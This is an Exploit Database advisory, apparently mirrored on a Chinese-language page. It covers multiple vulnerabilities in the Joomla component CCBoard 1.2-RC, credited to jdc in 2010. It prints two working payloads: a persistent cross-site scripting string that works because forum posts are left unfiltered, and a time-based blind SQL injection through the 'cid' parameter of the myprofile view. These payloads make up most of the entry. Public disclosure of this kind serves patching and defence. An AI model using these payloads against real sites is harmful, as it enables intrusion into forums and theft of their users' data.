Joomla! Component CCBoard 1.2-RC – Multiple Vulnerabilities

• Exploit Database
• 15 阅读

• 作者： jdc
  日期： 2010-11-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15518/

• # Exploit Title: Joomla Component com_ccboard Multiple Vulnerabilities
  # Date: 13 Nov 2010
  # Author: jdc
  # Category: webapps/0day
  # Version: 1.2-RC
  # Download: http://codeclassic.org/the-downloads/joomla-extensionscomponents/292-ccboard-bulletin-board-forum.html
  
  
  Persistent XSS
  --------------
  ccBoard doesn't filter its posts for HTML... at all:
  <script>prompt(1)</script>
  
  
  Blind SQL Injection
  -------------------
  NOTE: must be logged in
  ?option=com_ccboard
  &view=myprofile
  &cid=63 and benchmark(5000000,md5(1))